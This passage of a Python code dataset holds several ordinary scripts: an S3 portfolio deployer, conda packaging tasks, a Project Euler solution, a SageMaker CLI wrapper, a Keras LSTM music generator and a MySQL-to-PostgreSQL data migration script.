myzip.open(name)\n personal_bucket.upload_fileobj(obj, name,\n ExtraArgs={'ContentType': mimetypes.guess_type(name)[0]})\n personal_bucket.Object(name).Acl().put(ACL='public-read')\n\n topic.publish(Subject='AWS to IRB: Success', Message='Personal Landing has been deployed :)')\n\n if job:\n codepipeline = boto3.client('codepipeline')\n codepipeline.put_job_success_result(jobId=job['id'])\n\n except:\n topic.publish(Subject='AWS to IRB: Failure', Message='Personal Landing has failed X')\n raise\n return {\n 'statusCode': 200,\n 'body': json.dumps('Portfolio deployed at https://ianbunn.studio!')\n }\n","sub_path":"uploadPersonalLambda.py","file_name":"uploadPersonalLambda.py","file_ext":"py","file_size_in_byte":1993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"582673132","text":"# coding: utf-8\n# Copyright (c) Materials Virtual Lab.\n\nimport hashlib\nimport os\nimport pkg_resources\nimport requests\nfrom invoke import task\n\nfrom monty.os import cd\n\n__author__ = \"Shyue Ping Ong\"\n__email__ = \"ongsp@ucsd.edu\"\n\n\nmodule_dir = os.path.dirname(os.path.abspath(__file__))\n\n\ndef load_template(fname):\n with open(fname) as f:\n contents = f.read()\n from jinja2 import Template\n return Template(contents)\n\n\ndef calc_md5(fname):\n hash_md5 = hashlib.md5()\n with open(fname, \"rb\") as f:\n for chunk in iter(lambda: f.read(4096), b\"\"):\n hash_md5.update(chunk)\n return hash_md5.hexdigest()\n\n\n@task\ndef update_pypi(ctx, pkg):\n\n r = requests.get(\"http://pypi.org/project/%s/\" % pkg)\n html_doc = r.text\n from bs4 import BeautifulSoup\n soup = BeautifulSoup(html_doc, 'html.parser')\n header = soup.h1.text\n ver = header.strip().split()[-1]\n \n meta = os.path.join(module_dir, \"conda-skeletons\", pkg, \"meta.yaml\")\n url = \"https://pypi.io/packages/source/%s/%s/%s-%s.tar.gz\" % (pkg[0], pkg, pkg, ver)\n response = requests.get(url, stream=True)\n\n with open(\"temp.tar.gz\", \"wb\") as f:\n for data in response.iter_content():\n f.write(data)\n md5 = calc_md5(\"temp.tar.gz\")\n os.remove(\"temp.tar.gz\")\n\n lines = []\n current_ver = None\n with open(meta) as f:\n for l in f:\n if l.startswith('{% set version ='):\n current_ver = l.strip().split(\"=\")[-1]\n current_ver = current_ver.split(\"%\")[0].strip().strip(\"\\\"\")\n lines.append('{%% set version = \"%s\" %%}' % ver)\n elif l.startswith('{% set md5 =') and current_ver != ver and ver != \"different\":\n lines.append('{%% set md5 = \"%s\" %%}' % md5)\n else:\n lines.append(l.rstrip(\"\\n\"))\n\n if current_ver != ver and ver != \"different\":\n print(\"Updated %s from %s to %s!\" % (pkg, current_ver, ver))\n with open(meta, \"wt\") as f:\n f.write(\"\\n\".join(lines))\n else:\n print(\"%s current version (%s) is up to date!\" % (pkg, ver))\n\n\ndef get_env_version(pkg):\n try:\n return pkg_resources.get_distribution(pkg).version\n except (ImportError, pkg_resources.DistributionNotFound):\n return None\n return None\n\n\n@task\ndef generate_description(ctx):\n desc = []\n with cd(os.path.join(module_dir, \"conda-skeletons\")):\n for pkg in os.listdir(\".\"):\n with open(os.path.join(module_dir, \"conda-skeletons\", pkg, \"meta.yaml\")) as f:\n contents = f.read()\n from jinja2 import Template\n t = Template(contents)\n import yaml\n d = yaml.load(t.render())\n description = d[\"about\"].get(\"description\")\n if description is not None:\n desc.append('| %s | %s |
' % (t.module.name, description.strip()))\n with open(\"description.html\", \"wt\") as f:\n f.write(\"\" + \"\\n\".join(desc) + \"
\")\n\n\n@task\ndef update_templates(ctx):\n with cd(os.path.join(module_dir, \"conda-skeletons\")):\n for pkg in os.listdir(\".\"):\n update_pypi(ctx, pkg)\n\n\n@task\ndef build_conda(ctx, pkg):\n with cd(os.path.join(module_dir, \"conda-skeletons\")):\n print(\"Building %s\" % pkg)\n ctx.run(\"conda build --skip-existing --user matsci %s\" % pkg)\n # ctx.run(\"conda build --skip-existing --user matsci --python 3.6 %s\" % pkg)\n # ctx.run(\"conda build --skip-existing --user matsci --python 2.7 %s\" % pkg)\n\n@task\ndef build_all(ctx):\n pkgs = sorted(os.listdir(os.path.join(module_dir, \"conda-skeletons\")))\n pkgs = [p for p in pkgs if p.lower() not in [\"pybtex\", \"bader\", \"boltztrap\"]]\n for pkg in pkgs:\n try:\n build_conda(ctx, pkg)\n except:\n print(\"Failed for %s\" % pkg)\n","sub_path":"tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":3943,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"523782972","text":"#There are exactly ten ways of selecting three from five, 12345:\n#123, 124, 125, 134, 135, 145, 234, 235, 245, and 345\n#How many, not necessarily distinct, values of pascal's triangle in the first 100 rows are greater than one-million?\n\n\n# to get each number in row you simply multiply the previous number (all rows start with 1) by the (row number - term number)/(1+termnumber) assuming the first term after 1 is \"0\"\n\n#example row 4 is 1 4 6 4 1 that is 1 * (4/1) = 4, 4*(3/2) =6, 6*(2/3) = 4, 4* (1/4) = 1 \n\n# this means that we don't need to cache Pascal's triangle which was previously my intent to improve upon the brute force method. With a cutoff at one million as the result of a term, and utilizing the symmetry of the triangle\n#this should produce the most efficient results\ncount = 0\nlimit = 1000000\nfor i in range(3,101,1):\n term = 0\n value = 1\n while value < limit and term < i/2:\n term += 1\n value = value * (i-term+1)/(term)\n \n if value > limit:\n count += (i+1) - 2*(term)\n \n\nprint(\"the number of terms over 1 million in the first 100 rows of Pascal's Triangle is\", count)","sub_path":"Project Euler/Complete/053_Combinatoric_selections.py","file_name":"053_Combinatoric_selections.py","file_ext":"py","file_size_in_byte":1146,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"208959693","text":"#!/usr/bin/python\n# -*- codding: utf-8 -*-\nimport os\nimport sys\nsys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__))))\nfrom common.execute_command import execute_one_parameter\n\n\n# url : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/sagemaker/describe-processing-job.html\nif __name__ == '__main__':\n \"\"\"\n\tcreate-processing-job : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/sagemaker/create-processing-job.html\n\tlist-processing-jobs : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/sagemaker/list-processing-jobs.html\n\tstop-processing-job : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/sagemaker/stop-processing-job.html\n \"\"\"\n\n parameter_display_string = \"\"\"\n # processing-job-name : The name of the processing job. The name must be unique within an AWS Region in the AWS account.\n \"\"\"\n\n add_option_dict = {}\n #######################################################################\n # setting option use\n # ex: add_option_dict[\"setting_matching_parameter\"] = \"--owners\"\n # ex: add_option_dict[\"setting_key\"] = \"owner_id\"\n\n #######################################################################\n # single parameter\n # ex: add_option_dict[\"no_value_parameter_list\"] = \"--single-parameter\"\n\n #######################################################################\n # parameter display string\n add_option_dict[\"parameter_display_string\"] = parameter_display_string\n\n execute_one_parameter(\"sagemaker\", \"describe-processing-job\", \"processing-job-name\", add_option_dict)","sub_path":"sagemaker_read_1/processing-job_list.py","file_name":"processing-job_list.py","file_ext":"py","file_size_in_byte":1622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"261113553","text":"import numpy as np\r\nimport random\r\nfrom keras.layers import Dense, LSTM, Dropout, Activation, Bidirectional\r\nfrom keras.models import Sequential\r\nfrom keras.optimizers import RMSprop\r\n\r\n\r\ndef command_model(commands, epochs):\r\n num_datos = len(commands)\r\n note_register = sorted(list(set(commands)))\r\n # print(note_register)\r\n print(\"%i comandos en total.\" % len(note_register))\r\n\r\n note_indices = dict((c, i) for i, c in enumerate(note_register))\r\n indices_note = dict((i, c) for i, c in enumerate(note_register))\r\n\r\n maxlen = 20\r\n step = 1\r\n sequences = []\r\n next_notes = []\r\n for i in range(0, num_datos - maxlen, step):\r\n sequences.append(commands[i: i + maxlen])\r\n next_notes.append(commands[i + maxlen])\r\n\r\n x = np.zeros((len(sequences), maxlen, len(note_register)), dtype=np.bool)\r\n y = np.zeros((len(sequences), len(note_register)), dtype=np.bool)\r\n\r\n for i, sequence in enumerate(sequences):\r\n for t, note in enumerate(sequence):\r\n x[i, t, note_indices[note]] = 1\r\n y[i, note_indices[next_notes[i]]] = 1\r\n\r\n def sample(preds, temperature=1.0):\r\n preds = np.asarray(preds).astype('float64')\r\n preds = np.log(preds) / temperature\r\n exp_preds = np.exp(preds)\r\n preds = exp_preds / np.sum(exp_preds)\r\n probas = np.random.multinomial(1, preds, 1)\r\n return np.argmax(probas)\r\n\r\n def generate_music(length, diversity, model):\r\n start_index = random.randint(0, num_datos - maxlen - 1)\r\n generated = []\r\n sentence = commands[start_index: start_index + maxlen]\r\n generated += sentence\r\n for i in range(length):\r\n x_pred = np.zeros((1, maxlen, len(note_register)), dtype=np.bool)\r\n for t, note in enumerate(sentence):\r\n x_pred[0, t, note_indices[note]] = 1.\r\n\r\n preds = model.predict(x_pred, verbose=0)[0]\r\n next_index = sample(preds, diversity)\r\n next_note = indices_note[next_index]\r\n\r\n generated += [next_note]\r\n sentence = sentence[1:] + [next_note]\r\n return generated\r\n\r\n notes_model = Sequential()\r\n notes_model.add(LSTM(64, input_shape=(maxlen, len(note_register))))\r\n notes_model.add(Dropout(0.2))\r\n notes_model.add(Dense(len(note_register)))\r\n notes_model.add(Activation('softmax'))\r\n optimizer = RMSprop(lr=0.01)\r\n notes_model.compile(loss='binary_crossentropy', optimizer=optimizer, metrics=['accuracy'])\r\n\r\n notes_model.fit(x, y, batch_size=64, epochs=epochs, verbose=0)\r\n\r\n music_gen = generate_music(3000, 0.5, notes_model)\r\n\r\n return music_gen\r\n","sub_path":"command_model.py","file_name":"command_model.py","file_ext":"py","file_size_in_byte":2650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"526097410","text":"\"\"\"\nScript to migrate the existing data (in MySQL) into PostgreSQL\n\nPrereqs:\n* for each table in the old database, there is a corresponding file created\n via: mysqldump -u ozp -p ozp TABLENAME > TABLENAME.sql --complete-insert --hex-blob\n* all images have been copied to a local directory\n* the database referenced in settings.py is empty\n\nUsage:\n * acquire the sql dumps and images from the production server using the\n generate_sql_dumps.sh script (or similar)\n * update SQL_FILE_PATH, IMAGE_FILE_PATH, and DEFAULT_SECURITY_MARKING\n as necessary\n * if the attached database is not empty, run python manage.py flush\n * python onetime_db_migration.py\n\"\"\"\nimport datetime\nimport json\nimport logging\nimport os\nimport pytz\nimport re\nimport shutil\nimport sys\nimport uuid\n\nsys.path.insert(0, os.path.realpath(os.path.join(os.path.dirname(__file__), '../')))\n\nos.environ['DJANGO_SETTINGS_MODULE'] = 'ozp.settings'\nimport django\nfrom django.conf import settings\n\nfrom ozpcenter import models\nfrom ozpcenter import model_access\nfrom ozpcenter import utils\n\nfrom ozpiwc import models as iwc_models\n\n# path to the SQL dump files\nSQL_FILE_PATH = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'sql_dumps')\n# path to the images\nIMAGE_FILE_PATH = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'images')\n\nDEFAULT_SECURITY_MARKING = \"TOP SECRET\"\n\nlogging.basicConfig(format='%(levelname)s: %(message)s', level=logging.INFO)\n# logging.basicConfig(filename='migration.log', format='%(levelname)s: %(message)s', level=logging.INFO)\n\ndef get_date_from_str(date_str):\n \"\"\"\n Create a datetime object in UTC from a string\n\n Assumes the string was in format YYYY-MM-DD HH:MM:SS\n \"\"\"\n if not date_str:\n return None\n d = datetime.datetime.strptime(date_str, '%Y-%m-%d %H:%M:%S')\n return pytz.timezone('UTC').localize(d)\n\ndef get_index_next_unescaped_quote(str):\n \"\"\"\n Get the index of the next unescaped single quote in a given string\n \"\"\"\n for i, c in enumerate(str):\n if c == \"'\" and str[i-1] != \"\\\\\":\n return i\n\ndef get_columns(table):\n \"\"\"\n Get the columns of a table in an array\n\n Columns will be in the same order as the values appear in the data\n \"\"\"\n with open('{0!s}/{1!s}.sql'.format(SQL_FILE_PATH, table), 'r') as f:\n data = f.read().replace('\\n', '')\n # extract a string like (`id`, `version`, `created_by_id`)\n columns = utils.find_between(data, \"INSERT INTO `{0!s}`\".format(table), \" VALUES\")\n # remove parenthesis, backticks, and spaces\n columns = re.sub('[`() ]', '', columns)\n columns = columns.split(',')\n return columns\n\ndef get_values(table, column_count):\n \"\"\"\n Get the values of a table in an array of arrays\n\n Args:\n table: name of the database table\n column_count: number of columns in this table\n \"\"\"\n values = []\n with open('{0!s}/{1!s}.sql'.format(SQL_FILE_PATH, table), 'r') as f:\n data = f.read().replace('\\n', '')\n # extract the data we want\n values_str = utils.find_between(data, \"VALUES \", \");\") + ')'\n\n # values can contain special chars like parenthesis and commas, so we\n # have to be smart about how we extract the data\n\n while values_str:\n if values_str[0] != '(':\n logging.error('Error: each value must start with opening parenthesis')\n return None\n # remove leading '('\n values_str = values_str[1:]\n # create empty array that will hold all values for this entry\n entry_values = []\n current_entry_finished = False\n columns_processed = 0\n while not current_entry_finished:\n # check for hex value (includes booleans)\n if values_str[:2] == '0x':\n val = re.findall(r'0x[0-9ABCDEF]*', values_str)[0]\n if val == '0x00':\n entry_values.append(False)\n elif val == '0x01':\n entry_values.append(True)\n else:\n # assume the hex value is a UUID\n entry_values.append(uuid.UUID(hex=val[2:]))\n # remove extracted data from the original string\n idx = len(val)\n values_str = values_str[idx:]\n columns_processed += 1\n # logging.debug('got hex value: %s' % val)\n # remove comma\n if values_str[0] != ',' and columns_processed != column_count:\n logging.error('Error: comma not found after extracting hex value')\n return None\n if columns_processed < column_count:\n values_str = values_str[1:]\n # check for a string value\n elif values_str[0] == \"'\":\n # read all chars between this quote and next unescaped quote\n # remove the leading quote\n values_str = values_str[1:]\n # find the index of the next unescaped quote\n idx = get_index_next_unescaped_quote(values_str)\n val = values_str[:idx]\n entry_values.append(val)\n # remove extracted data from original string\n idx = len(val) + 1 # +1 for the trailing quote\n values_str = values_str[idx:]\n columns_processed += 1\n # logging.debug('got string value: %s' % val)\n # remove comma\n if values_str[0] != ',' and columns_processed != column_count:\n logging.error('Error: comma not found after extracting string value. string[0]: {0!s}'.format(values_str[0]))\n return None\n if columns_processed < column_count:\n values_str = values_str[1:]\n # check for NULL value\n elif values_str[0:4] == 'NULL':\n val = None\n entry_values.append(val)\n values_str = values_str[4:]\n columns_processed += 1\n # logging.debug('got NULL value: %s' % val)\n # remove comma\n if values_str[0] != ',' and columns_processed != column_count:\n logging.error('Error: comma not found after extracting NULL value')\n return None\n if columns_processed < column_count:\n values_str = values_str[1:]\n # check for integer value\n elif values_str[0] in ['0','1','2','3','4','5','6','7','8','9']:\n val = re.findall(r'\\d+', values_str)[0]\n entry_values.append(val)\n # remove extracted data from original string\n idx = len(val)\n values_str = values_str[idx:]\n columns_processed += 1\n # logging.debug('got integer value: %s' % val)\n # remove comma\n if values_str[0] != ',' and columns_processed != column_count:\n logging.error('Error: comma not found after extracting integer value')\n return None\n if columns_processed < column_count:\n values_str = values_str[1:]\n else:\n logging.error('Error: found invalid character in data: {0!s}'.format(values_str[0]))\n return None\n\n if columns_processed == column_count:\n current_entry_finished = True\n # logging.debug('completed processing of row')\n # remove closing parenthesis\n if values_str[0] != ')':\n logging.error('Error: closing parenthesis not found at end of row data')\n return None\n values_str = values_str[1:]\n # remove the comma between entries, unless this is the last entry\n if values_str:\n values_str = values_str[1:]\n\n values.append(entry_values)\n return values\n\ndef run():\n logging.info('running db_migration')\n # setup: http://stackoverflow.com/questions/25537905/django-1-7-throws-django-core-exceptions-appregistrynotready-models-arent-load\n django.setup()\n\n # first, create the default groups\n # Create Groups\n logging.info('creating default groups')\n models.Profile.create_groups()\n # create default image types\n logging.info('creating default image types')\n small_icon_type = models.ImageType(name='small_icon',\n max_size_bytes='4096')\n small_icon_type.save()\n large_icon_type = models.ImageType(name='large_icon',\n max_size_bytes='8192')\n large_icon_type.save()\n banner_icon_type = models.ImageType(name='banner_icon',\n max_size_bytes='2097152')\n banner_icon_type.save()\n large_banner_icon_type = models.ImageType(name='large_banner_icon',\n max_size_bytes='2097152')\n large_banner_icon_type.save()\n small_screenshot_type = models.ImageType(name='small_screenshot',\n max_size_bytes='1048576')\n small_screenshot_type.save()\n large_screenshot_type = models.ImageType(name='large_screenshot',\n max_size_bytes='1048576')\n large_screenshot_type.save()\n\n category_mapper = migrate_category()\n agency_mapper = migrate_agency()\n type_mapper = migrate_type()\n contact_type_mapper = migrate_contact_type()\n profile_mapper = migrate_profile()\n notification_mapper = migrate_notification(profile_mapper)\n migrate_profile_dismissed_notifications(profile_mapper, notification_mapper)\n listing_mapper = migrate_listing(category_mapper, agency_mapper, type_mapper,\n contact_type_mapper, profile_mapper)\n migrate_application_library_entry(profile_mapper, listing_mapper)\n migrate_doc_url(listing_mapper)\n migrate_item_comment(profile_mapper, listing_mapper)\n migrate_iwc_data_object(profile_mapper)\n migrate_listing_category(listing_mapper, category_mapper)\n migrate_listing_profile(profile_mapper, listing_mapper)\n migrate_listing_screenshot(listing_mapper)\n migrate_listing_tags(listing_mapper)\n migrate_contact(listing_mapper, contact_type_mapper)\n listing_activity_mapper = migrate_listing_activities(profile_mapper, listing_mapper)\n migrate_change_detail(listing_activity_mapper)\n migrate_rejection_data(listing_mapper, listing_activity_mapper)\n\n\ndef migrate_category():\n logging.debug('migrating categories...')\n columns = get_columns('category')\n # ['id', 'version', 'created_by_id', 'created_date', 'description', 'edited_by_id', 'edited_date', 'title']\n assert columns[0] == 'id'\n assert columns[1] == 'version'\n assert columns[2] == 'created_by_id'\n assert columns[3] == 'created_date'\n assert columns[4] == 'description'\n assert columns[5] == 'edited_by_id'\n assert columns[6] == 'edited_date'\n assert columns[7] == 'title'\n values = get_values('category', len(columns))\n # logging.debug('category columns: %s' % columns)\n logging.info('Categories to migrate: {0!s}'.format(len(values)))\n # logging.debug('category values: %s' % values)\n # map old ids to new ones for future migrations: {'': ''}\n category_mapper = {}\n logging.info('==========================')\n for i in values:\n old_id = i[0]\n description = i[4]\n title = i[7]\n logging.info('Adding category title: {0!s}, description: {1!s}'.format(title, description))\n cat = models.Category(description=description, title=title)\n cat.save()\n category_mapper[i[0]] = str(cat.id)\n return category_mapper\n\ndef migrate_agency():\n logging.debug('migrating agencies...')\n columns = get_columns('agency')\n # ['id', 'version', 'created_by_id', 'created_date', 'edited_by_id', 'edited_date', 'icon_id', 'short_name', 'title']\n assert columns[0] == 'id'\n assert columns[1] == 'version'\n assert columns[2] == 'created_by_id'\n assert columns[3] == 'created_date'\n assert columns[4] == 'edited_by_id'\n assert columns[5] == 'edited_date'\n assert columns[6] == 'icon_id'\n assert columns[7] == 'short_name'\n assert columns[8] == 'title'\n values = get_values('agency', len(columns))\n # logging.debug('category columns: %s' % columns)\n logging.info('Agencies to migrate: {0!s}'.format(len(values)))\n # logging.debug('agency values: %s' % values)\n # map old ids to new ones for future migrations: {'': ''}\n agency_mapper = {}\n logging.info('==========================')\n for i in values:\n old_id = i[0]\n short_name = i[7]\n title = i[8]\n logging.info('Adding agency title: {0!s}, short_name: {1!s}'.format(title, short_name))\n a = models.Agency(short_name=short_name, title=title)\n a.save()\n agency_mapper[i[0]] = str(a.id)\n return agency_mapper\n\ndef migrate_type():\n logging.debug('migrating type...')\n columns = get_columns('type')\n # ['id', 'version', 'created_by_id', 'created_date', 'description', 'edited_by_id', 'edited_date', 'title']\n assert columns[0] == 'id'\n assert columns[1] == 'version'\n assert columns[2] == 'created_by_id'\n assert columns[3] == 'created_date'\n assert columns[4] == 'description'\n assert columns[5] == 'edited_by_id'\n assert columns[6] == 'edited_date'\n assert columns[7] == 'title'\n values = get_values('type', len(columns))\n # logging.debug('category columns: %s' % columns)\n logging.info('Listing Types to migrate: {0!s}'.format(len(values)))\n # logging.debug('agency values: %s' % values)\n # map old ids to new ones for future migrations: {'': ''}\n type_mapper = {}\n logging.info('==========================')\n for i in values:\n old_id = i[0]\n description = i[4]\n title = i[7]\n logging.info('Adding listing type title: {0!s}, description: {1!s}'.format(title, description))\n t = models.ListingType(title=title, description=description)\n t.save()\n type_mapper[i[0]] = str(t.id)\n return type_mapper\n\ndef migrate_contact_type():\n logging.debug('migrating contact_type...')\n columns = get_columns('contact_type')\n # ['id', 'version', 'created_by_id', 'created_date', 'edited_by_id', 'edited_date', 'required', 'title']\n assert columns[0] == 'id'\n assert columns[1] == 'version'\n assert columns[2] == 'created_by_id'\n assert columns[3] == 'created_date'\n assert columns[4] == 'edited_by_id'\n assert columns[5] == 'edited_date'\n assert columns[6] == 'required'\n assert columns[7] == 'title'\n values = get_values('contact_type', len(columns))\n # logging.debug('category columns: %s' % columns)\n logging.info('ContactTypes to migrate: {0!s}'.format(len(values)))\n # logging.debug('agency values: %s' % values)\n # map old ids to new ones for future migrations: {'': ''}\n contact_type_mapper = {}\n logging.info('==========================')\n for i in values:\n old_id = i[0]\n required = i[6]\n title = i[7]\n logging.info('Adding contact_type title: {0!s}, required: {1!s}'.format(title, required))\n ct = models.ContactType(name=title, required=required)\n ct.save()\n contact_type_mapper[i[0]] = str(ct.id)\n return contact_type_mapper\n\ndef migrate_profile():\n logging.debug('migrating profile...')\n columns = get_columns('profile')\n # ['id', 'version', 'bio', 'created_by_id', 'created_date', 'display_name', 'edited_by_id', 'edited_date', 'email', 'highest_role', 'last_login', 'username', 'launch_in_webtop']\n assert columns[0] == 'id'\n assert columns[1] == 'version'\n assert columns[2] == 'bio'\n assert columns[3] == 'created_by_id'\n assert columns[4] == 'created_date'\n assert columns[5] == 'display_name'\n assert columns[6] == 'edited_by_id'\n assert columns[7] == 'edited_date'\n assert columns[8] == 'email'\n assert columns[9] == 'highest_role'\n assert columns[10] == 'last_login'\n assert columns[11] == 'username'\n assert columns[12] == 'launch_in_webtop'\n values = get_values('profile', len(columns))\n # logging.debug('category columns: %s' % columns)\n logging.info('Profiles to migrate: {0!s}'.format(len(values)))\n # logging.debug('agency values: %s' % values)\n # map old ids to new ones for future migrations: {'': ''}\n profile_mapper = {}\n logging.info('==========================')\n for i in values:\n old_id = i[0]\n bio = i[2]\n display_name = i[5]\n email = i[8]\n highest_role = i[9]\n last_login = i[10]\n username = i[11]\n if not display_name:\n display_name = username\n kwargs = {\n 'bio': bio,\n 'display_name': display_name,\n 'email': email,\n 'dn': username\n }\n # TODO: how to extract CN from DN?\n cn = username\n # sanitize username\n username = cn[0:30] # limit to 30 chars\n username = username.replace(' ', '_') # no spaces\n username = username.replace(\"'\", \"\") # no apostrophes\n username = username.lower() # all lowercase\n\n # don't bother updating groups, organizations, permissions - this will\n # be done automatically the first time authorization is checked\n p = models.Profile.create_user(username, **kwargs)\n\n logging.info('Adding profile username: {0!s}, display_name: {1!s}, dn: {2!s}'.format(p.user.username, p.display_name, p.dn))\n profile_mapper[i[0]] = str(p.id)\n return profile_mapper\n\ndef migrate_notification(profile_mapper):\n logging.debug('migrating notification...')\n columns = get_columns('notification')\n # ['id', 'version', 'created_by_id', 'created_date', 'edited_by_id', 'edited_date', 'message', 'expires_date']\n assert columns[0] == 'id'\n assert columns[1] == 'version'\n assert columns[2] == 'created_by_id'\n assert columns[3] == 'created_date'\n assert columns[4] == 'edited_by_id'\n assert columns[5] == 'edited_date'\n assert columns[6] == 'message'\n assert columns[7] == 'expires_date'\n values = get_values('notification', len(columns))\n # logging.debug('category columns: %s' % columns)\n logging.info('Notifications to migrate: {0!s}'.format(len(values)))\n # logging.debug('agency values: %s' % values)\n # map old ids to new ones for future migrations: {'': ''}\n notification_mapper = {}\n logging.info('==========================')\n for i in values:\n old_id = i[0]\n message = i[6]\n expires_date = get_date_from_str(i[7])\n created_date = get_date_from_str(i[3])\n created_by_id = i[2]\n logging.info('Adding notification message: {0!s}, expires_date: {1!s}'.format(message, expires_date))\n p = models.Profile.objects.get(id=profile_mapper[created_by_id])\n n = models.Notification(message=message, expires_date=expires_date, created_date=created_date, author=p)\n n.save()\n notification_mapper[i[0]] = str(n.id)\n return notification_mapper\n\ndef migrate_profile_dismissed_notifications(profile_mapper, notification_mapper):\n logging.debug('migrating migrate_profile_dismissed_notifications...')\n columns = get_columns('profile_dismissed_notifications')\n # ['notification_id', 'profile_id']\n assert columns[0] == 'notification_id'\n assert columns[1] == 'profile_id'\n values = get_values('profile_dismissed_notifications', len(columns))\n logging.info('Dismissed notifications to migrate: {0!s}'.format(len(values)))\n for i in values:\n notification_id = i[0]\n profile_id = i[1]\n notification = models.Notification.objects.get(id=notification_mapper[notification_id])\n profile = models.Profile.objects.get(id=profile_mapper[profile_id])\n notification.dismissed_by.add(profile)\n\ndef migrate_image(image_uuid, image_type):\n \"\"\"\n Migrate an image\n\n A image_mapper is not needed, as the old uuid will be the new uuid\n \"\"\"\n # determine the image's extension\n VALID_IMAGE_TYPES = ['png', 'jpg', 'jpeg', 'gif']\n file_extension = None\n for i in VALID_IMAGE_TYPES:\n filename = IMAGE_FILE_PATH + '/{0!s}.{1!s}'.format(image_uuid, i)\n if os.path.isfile(filename):\n file_extension = i\n break\n if not file_extension:\n logging.error('Error: no file extension found for image {0!s}'.format(image_uuid))\n return\n\n # set default security marking\n image_type = models.ImageType.objects.get(name=image_type)\n img = models.Image(uuid=image_uuid, security_marking=DEFAULT_SECURITY_MARKING,\n file_extension=file_extension, image_type=image_type)\n img.save()\n\n src = filename\n dest = settings.MEDIA_ROOT + str(img.id) + '_' + img.image_type.name + '.' + file_extension\n shutil.copy(src, dest)\n logging.info('Migrated image: {0!s}, type: {1!s}'.format(image_uuid, image_type))\n return img\n\ndef migrate_listing(category_mapper, agency_mapper, type_mapper,\n contact_type_mapper, profile_mapper):\n logging.debug('migrating listings')\n columns = get_columns('listing')\n logging.debug('listing columns: {0!s}'.format(columns))\n # ['id', 'version', 'agency_id', 'approval_status', 'approved_date', 'avg_rate',\n # 'created_by_id', 'created_date', 'description', 'description_short',\n # 'edited_by_id', 'edited_date', 'small_icon_id', 'large_icon_id',\n # 'banner_icon_id', 'featured_banner_icon_id', 'is_enabled', 'is_featured',\n # 'last_activity_id', 'launch_url', 'requirements', 'title', 'total_comments',\n # 'total_rate1', 'total_rate2', 'total_rate3', 'total_rate4', 'total_rate5',\n # 'total_votes', 'type_id', 'uuid', 'version_name', 'what_is_new',\n # 'width', 'singleton', 'height']\n assert columns[0] == 'id'\n assert columns[1] == 'version'\n assert columns[2] == 'agency_id'\n assert columns[3] == 'approval_status'\n assert columns[4] == 'approved_date'\n assert columns[5] == 'avg_rate'\n assert columns[6] == 'created_by_id'\n assert columns[7] == 'created_date'\n assert columns[8] == 'description'\n assert columns[9] == 'description_short'\n assert columns[10] == 'edited_by_id'\n assert columns[11] == 'edited_date'\n assert columns[12] == 'small_icon_id'\n assert columns[13] == 'large_icon_id'\n assert columns[14] == 'banner_icon_id'\n assert columns[15] == 'featured_banner_icon_id'\n assert columns[16] == 'is_enabled'\n assert columns[17] == 'is_featured'\n assert columns[18] == 'last_activity_id'\n assert columns[19] == 'launch_url'\n assert columns[20] == 'requirements'\n assert columns[21] == 'title'\n assert columns[22] == 'total_comments'\n assert columns[23] == 'total_rate1'\n assert columns[24] == 'total_rate2'\n assert columns[25] == 'total_rate3'\n assert columns[26] == 'total_rate4'\n assert columns[27] == 'total_rate5'\n assert columns[28] == 'total_votes'\n assert columns[29] == 'type_id'\n assert columns[30] == 'uuid'\n assert columns[31] == 'version_name'\n assert columns[32] == 'what_is_new'\n assert columns[33] == 'width'\n assert columns[34] == 'singleton'\n assert columns[35] == 'height'\n values = get_values('listing', len(columns))\n # logging.debug('listing values: %s' % values)\n logging.info('Listings to migrate: {0!s}'.format(len(values)))\n\n # map old ids to new ones for future migrations: {'': ''}\n listing_mapper = {}\n logging.info('==========================')\n for i in values:\n try:\n old_id = i[0]\n agency = models.Agency.objects.get(id=agency_mapper[i[2]])\n title = i[21]\n # approval_status should be a 1-1 mapping\n approval_status = i[3]\n approved_date = get_date_from_str(i[4])\n avg_rate = i[5]\n created_by_id = i[6]\n created_date = get_date_from_str(i[7])\n description = i[8]\n description_short = i[9]\n edited_by_id = i[10]\n edited_date = get_date_from_str(i[11])\n small_icon_id = i[12]\n small_icon = migrate_image(small_icon_id, 'small_icon')\n large_icon_id = i[13]\n large_icon = migrate_image(large_icon_id, 'large_icon')\n banner_icon_id = i[14]\n banner_icon = migrate_image(banner_icon_id, 'banner_icon')\n featured_banner_icon_id = i[15]\n large_banner_icon = migrate_image(featured_banner_icon_id, 'large_banner_icon')\n is_enabled = i[16]\n is_featured = i[17]\n last_activity_id = i[18]\n launch_url = i[19]\n requirements = i[20]\n total_comments = i[22]\n total_rate1 = i[23]\n total_rate2 = i[24]\n total_rate3 = i[25]\n total_rate4 = i[26]\n total_rate5 = i[27]\n total_votes = i[28]\n listing_type = models.ListingType(id=type_mapper[i[29]])\n uuid = i[30]\n version_name = i[31]\n what_is_new = i[32]\n iframe_compatible = not i[34]\n\n logging.info('Adding listing title: {0!s}'.format((title)))\n # TODO: unique_name?\n listing = models.Listing(title=title, agency=agency,\n approval_status=approval_status, approved_date=approved_date,\n edited_date=edited_date, description=description,\n description_short=description_short, is_enabled=is_enabled,\n is_featured=is_featured, launch_url=launch_url,\n listing_type=listing_type, version_name=version_name,\n what_is_new=what_is_new, iframe_compatible=iframe_compatible,\n requirements=requirements, small_icon=small_icon,\n large_icon=large_icon, banner_icon=banner_icon,\n large_banner_icon=large_banner_icon, avg_rate=avg_rate,\n total_votes=total_votes, total_rate5=total_rate5,\n total_rate4=total_rate4, total_rate3=total_rate3,\n total_rate2=total_rate2, total_rate1=total_rate1,\n total_reviews=total_comments, security_marking=DEFAULT_SECURITY_MARKING)\n 